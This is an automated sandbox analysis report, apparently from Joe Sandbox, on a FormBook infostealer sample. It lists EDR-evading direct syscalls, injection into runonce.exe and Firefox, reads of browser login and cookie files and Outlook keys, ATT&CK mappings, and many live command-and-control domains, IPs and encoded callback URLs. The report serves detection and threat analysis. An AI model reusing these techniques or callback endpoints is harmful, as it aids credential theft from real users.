        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF113 mov eax, dword ptr fs:[00000030h]3_2_376EF113

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtReadFile: Direct from: 0x77D429FCJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtQuerySystemInformation: Direct from: 0x77D42D1CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtProtectVirtualMemory: Direct from: 0x77D37A4EJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtMapViewOfSection: Direct from: 0x77D42C3CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtWriteVirtualMemory: Direct from: 0x77D42D5CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtAllocateVirtualMemory: Direct from: 0x77D42B1CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtResumeThread: Direct from: 0x77D435CCJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtDelayExecution: Direct from: 0x77D42CFCJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtReadVirtualMemory: Direct from: 0x77D42DACJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtOpenKeyEx: Direct from: 0x77D43BBCJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtQueryInformationToken: Direct from: 0x77D42BCCJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtSetInformationProcess: Direct from: 0x77D42B7CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtNotifyChangeKey: Direct from: 0x77D43B4CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtCreateFile: Direct from: 0x77D42F0CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtQueryValueKey: Direct from: 0x77D42B0CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtOpenSection: Direct from: 0x77D42D2CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtQueryVolumeInformationFile: Direct from: 0x77D42E4CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtDeviceIoControlFile: Direct from: 0x77D42A0CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtQuerySystemInformation: Direct from: 0x77D447ECJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtOpenFile: Direct from: 0x77D42CECJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtAllocateVirtualMemory: Direct from: 0x77D4480CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtProtectVirtualMemory: Direct from: 0x77D42EBCJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtWriteVirtualMemory: Direct from: 0x77D4482CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtOpenKeyEx: Direct from: 0x77D42ABCJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtCreateUserProcess: Direct from: 0x77D4363CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtQueryInformationProcess: Direct from: 0x77D42B46Jump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtResumeThread: Direct from: 0x77D42EDCJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtQueryAttributesFile: Direct from: 0x77D42D8CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtSetInformationThread: Direct from: 0x77D42A6CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtSetInformationThread: Direct from: 0x77D36319Jump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtCreateKey: Direct from: 0x77D42B8CJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeNtClose: Direct from: 0x77D42A8C
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: NULL target: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\runonce.exeThread register set: target process: 1204Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\runonce.exeThread APC queued: target process: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeProcess created: C:\Users\user\Desktop\ulACwpUCSU.exe "C:\Users\user\Desktop\ulACwpUCSU.exe"Jump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_00405D58 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D58

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		311
        Process Injection        		1
        Masquerading        		1
        OS Credential Dumping        		21
        Security Software Discovery        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Abuse Elevation Control Mechanism        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		311
        Process Injection        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Abuse Elevation Control Mechanism        		LSA Secrets3
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
        Obfuscated Files or Information        		Cached Domain Credentials4
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1451688 Sample: ulACwpUCSU.exe Startdate: 04/06/2024 Architecture: WINDOWS Score: 100 31 www.astralavenue.xyz 2->31 33 www.weeveno.com 2->33 35 33 other IPs or domains 2->35 49 Snort IDS alert for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for URL or domain 2->53 57 5 other signatures 2->57 10 ulACwpUCSU.exe 2 48 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 31->55 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 13 ulACwpUCSU.exe 6 10->13         started        process6 dnsIp7 43 drive.google.com 142.250.217.174, 443, 49792 GOOGLEUS United States 13->43 45 drive.usercontent.google.com 142.250.217.193, 443, 49793 GOOGLEUS United States 13->45 69 Maps a DLL or memory area into another process 13->69 17 eUbiubZkrHdFTtCYB.exe 13->17 injected signatures8 process9 signatures10 47 Found direct / indirect Syscall (likely to bypass EDR) 17->47 20 runonce.exe 13 17->20         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 20->59 61 Tries to harvest and steal browser information (history, passwords, etc) 20->61 63 Modifies the context of a thread in another process (thread injection) 20->63 65 2 other signatures 20->65 23 eUbiubZkrHdFTtCYB.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 tintasmaiscor.com 162.240.81.18, 49839, 49840, 49841 UNIFIEDLAYER-AS-1US United States 23->37 39 parkingpage.namecheap.com 91.195.240.19, 49794, 49803, 49804 SEDO-ASDE Germany 23->39 41 9 other IPs or domains 23->41 67 Found direct / indirect Syscall (likely to bypass EDR) 23->67 signatures15

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        ulACwpUCSU.exe100%AviraTR/AD.NsisInject.edpwl
        ulACwpUCSU.exe66%ReversingLabsWin32.Trojan.Leonem
        ulACwpUCSU.exe35%VirustotalBrowse
        ulACwpUCSU.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        webredir.vip.gandi.net0%VirustotalBrowse
        parkingpage.namecheap.com0%VirustotalBrowse
        drive.usercontent.google.com1%VirustotalBrowse
        www.click-advertising.net1%VirustotalBrowse
        shops.myshopify.com0%VirustotalBrowse
        www.barrettdigitalart.com100%Sophos S4malware callhome domain
        www.newstantonlocksmith.us1%VirustotalBrowse
        www.nurse-job2535.life0%VirustotalBrowse
        www.seductionsessions.co.uk1%VirustotalBrowse
        digitoxmarketing.com1%VirustotalBrowse
        www.barrettdigitalart.com2%VirustotalBrowse
        tintasmaiscor.com0%VirustotalBrowse
        02.32.jtrhc.fun1%VirustotalBrowse
        natroredirect.natrocdn.com0%VirustotalBrowse
        www.towelhoodie.com3%VirustotalBrowse
        www.gcashservice247.com3%VirustotalBrowse
        www.likbez22.store3%VirustotalBrowse
        www.peptily.shop0%VirustotalBrowse
        www.shigi.org1%VirustotalBrowse
        connect.hostinger.com0%VirustotalBrowse
        www.calmparents.us0%VirustotalBrowse
        www.cyberpsychsecurity.com1%VirustotalBrowse
        www.continentaloilandgas.com1%VirustotalBrowse
        www.issoweb.com1%VirustotalBrowse
        www.spazisostenibili.org0%VirustotalBrowse
        drive.google.com0%VirustotalBrowse
        api.msn.com0%VirustotalBrowse
        www.tintasmaiscor.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.barrettdigitalart.com/a8pp/100%Sophos S4malware callhome domain
        http://www.barrettdigitalart.com/a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL100%Sophos S4malware callhome domain
        http://www.seductionsessions.co.uk/a8pp/0%Avira URL Cloudsafe
        http://www.towelhoodie.com/a8pp/0%Avira URL Cloudsafe
        http://www.tintasmaiscor.com/a8pp/0%Avira URL Cloudsafe
        http://www.peptily.shop/a8pp/?2NlhHLS8=/NPZ6ym1eSqP6E/qwOmQvYjKsz7zkRsccrcByesNZAVEstX0SolnWK8jgzxt8MISaNzEdIb6rnMbXZkqzFIAORFEfuZ8IH0a3kCasVRTZJxsOlTMl/y3o9s=&0z=jXZhddsppL0%Avira URL Cloudsafe
        http://www.continentaloilandgas.com/a8pp/0%Avira URL Cloudsafe
        http://www.click-advertising.net/a8pp/?2NlhHLS8=Dft4chLLB7HQRgI1kvQb3UGdiigcwJaJso3MJc+IJoTJW0I2amM0Xj+YeLw4jIoNvtXY/7GemIMI+dXc5vnp9QE1cggkijBoQvQelzZ8ig3DEoIcGDshdqY=&0z=jXZhddsppL0%Avira URL Cloudsafe
        http://www.nurse-job2535.life/a8pp/0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://www.blissfulbooks.online/a8pp/?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL0%Avira URL Cloudsafe
        http://www.nurse-job2535.life/a8pp/?2NlhHLS8=ZUQ1TL0seNvx54VLi4j8goKVXeEHsH3HvniJXC80qaRkGy2/Bav7bR6THbfzZ3GDEHeASBxbKXGg0EinUgac1wLiet4LPvLUzSGHrF52u0MP0A2xTBnpXUY=&0z=jXZhddsppL0%Avira URL Cloudsafe
        http://www.seductionsessions.co.uk/a8pp/?2NlhHLS8=u2uhCbPEKv8ZkpElCasipCYoh7hjVHsJeshUYXe+26UO54wjNRlGrJIqe2/bB2Gg6hxh2QUpPcZvKht3Zd5FEOczln0DFiPIHlW4j3CMtDHw4ZJy68kQvjE=&0z=jXZhddsppL0%Avira URL Cloudsafe
        http://www.barrettdigitalart.com/a8pp/0%Avira URL Cloudsafe
        http://www.seductionsessions.co.uk/a8pp/2%VirustotalBrowse
        http://www.click-advertising.net/a8pp/0%Avira URL Cloudsafe
        https://www.gandi.net/en/domain0%Avira URL Cloudsafe
        http://www.calmparents.us/a8pp/?2NlhHLS8=NgQpJdLFdHgIa+1l29O1770Oq5lPJcvTMZvJdcQ/YcKsMhli5q4lfY4xaSICRuQBpvWxqNirPVzUz7JPsPacp8Mg1AroxlnuY82gnIQ9XdoCkQd3w5aTNck=&0z=jXZhddsppL0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%Avira URL Cloudsafe
        http://www.vgjimei.icu/a8pp/0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://www.blissfulbooks.online/a8pp/0%Avira URL Cloudsafe
        http://www.continentaloilandgas.com/a8pp/?2NlhHLS8=eXj7agnwQ7UtDQTI2/QeRjNOKmxKRYHEwlq+kXNt3DleoKuUYGucHmIzSo9PpxNipdSpHjsdoNiIZ3Hh69GYDO27Wp3lPM6WDcDlV706K5XwonPjk8UKoRY=&0z=jXZhddsppL0%Avira URL Cloudsafe
        https://www.google.com0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
        http://www.shootprecious.com/a8pp/0%Avira URL Cloudsafe
        http://www.shootprecious.com/a8pp/?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL0%Avira URL Cloudsafe
        http://www.towelhoodie.com/a8pp/?2NlhHLS8=IPQzDRTPddNuZ/HMr4F9le4A0likp4cPjTBZoWar0DW2Dke1nHX7p3PJPbmWMxtVZQ2vG/Syy6/u7vfLcEQjJE0ZPWoRIvOz07zRtU0HA7dN58xUlB4x570=&0z=jXZhddsppL0%Avira URL Cloudsafe
        http://www.tintasmaiscor.com/a8pp/?2NlhHLS8=4Lb2evqbqWm/eQEsCRZbIPf+4WOFbtHQ6zBEferLjExJaXLZsL3GLbWlHTrS18+QwpI6CqjMoX8o4lQjVBd1hnajfrB87pxWL6PWkXnwG2oHKjYPIKLzKN0=&0z=jXZhddsppL0%Avira URL Cloudsafe
        http://www.astralavenue.xyz/a8pp/?2NlhHLS8=Au5imsmV21JYiQqAtZZYW5jQMTc/TsZAtUnDsMKbX4YoEplVSL6Rm/9dTWFSyViTXIIw8p1ls4ghLUagt/HJKO94HieJHgrJIyAOML3UnsK6ear2OzXGe/M=&0z=jXZhddsppL0%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        https://apis.google.com0%Avira URL Cloudsafe
        http://www.barrettdigitalart.com/a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL0%Avira URL Cloudsafe
        http://www.calmparents.us/a8pp/0%Avira URL Cloudsafe
        http://www.cyberpsychsecurity.com/a8pp/0%Avira URL Cloudsafe
        http://www.cyberpsychsecurity.com/a8pp/?2NlhHLS8=eq13gBt76ePDaE9jPC0A9Iupd/gjzDBrOAbtoaeLD+8wGtFf895L9qocKFTqmVpd7xt5UEIOF7l9ga++P+8IeJMZhOURtvON+WXuvIh3J+ggFIDS+M1ogAg=&0z=jXZhddsppL0%Avira URL Cloudsafe
        http://www.astralavenue.xyz/a8pp/0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        webredir.vip.gandi.net
        		217.70.184.50
        		truetrueunknown
        www.astralavenue.xyz
        		162.0.237.22
        		truetrue
          		unknown
          parkingpage.namecheap.com
          		91.195.240.19
          		truetrueunknown
          drive.usercontent.google.com
          		142.250.217.193
          		truefalseunknown
          www.click-advertising.net
          		160.124.114.188
          		truetrueunknown
          shops.myshopify.com
          		23.227.38.74
          		truetrueunknown
          tintasmaiscor.com
          		162.240.81.18
          		truetrueunknown
          connect.hostinger.com
          		34.120.137.41
          		truefalseunknown
          natroredirect.natrocdn.com
          		85.159.66.93
          		truetrueunknown
          www.barrettdigitalart.com
          		172.67.205.56
          		truetrue
          • 100%, Sophos S4
          • 2%, Virustotal, Browse
          		unknown
          www.newstantonlocksmith.us
          		104.21.63.61
          		truetrueunknown
          02.32.jtrhc.fun
          		192.207.62.21
          		truetrueunknown
          drive.google.com
          		142.250.217.174
          		truefalseunknown
          www.nurse-job2535.life
          		64.190.62.22
          		truetrueunknown
          www.seductionsessions.co.uk
          		23.82.12.29
          		truetrueunknown
          digitoxmarketing.com
          		104.194.9.31
          		truetrueunknown
          www.shootprecious.com
          		unknown
          		unknowntrue
            		unknown
            www.gcashservice247.com
            		unknown
            		unknowntrueunknown
            www.calmparents.us
            		unknown
            		unknowntrueunknown
            www.towelhoodie.com
            		unknown
            		unknowntrueunknown
            www.likbez22.store
            		unknown
            		unknowntrueunknown
            www.peptily.shop
            		unknown
            		unknowntrueunknown
            www.cyberpsychsecurity.com
            		unknown
